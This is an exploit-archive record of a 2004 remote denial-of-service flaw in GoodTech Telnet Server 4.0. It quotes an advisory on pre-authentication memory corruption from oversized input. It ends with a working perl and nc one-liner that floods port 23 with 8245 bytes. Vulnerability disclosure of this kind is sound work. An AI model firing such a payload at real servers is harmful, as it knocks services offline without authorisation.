GoodTech Telnet Server 4.0 - Remote Denial of Service Vulnerability

2004-01-02T00:00:00
ID EDB-ID:23506
Type exploitdb
Reporter Donato Ferrante
Modified 2004-01-02T00:00:00

Description

GoodTech Telnet Server 4.0 Remote Denial Of Service Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/9337/info

GoodTech Telnet Server is reportedly prone to a denial of service vulnerability. This condition occurs prior to authentication when excessive data is received by the server. Exploitation could result in memory corruption, which could in turn be leveraged to execute arbitrary code, though this has not been confirmed by Symantec.

perl -e 'print "a"x8245' | nc www.example.com 23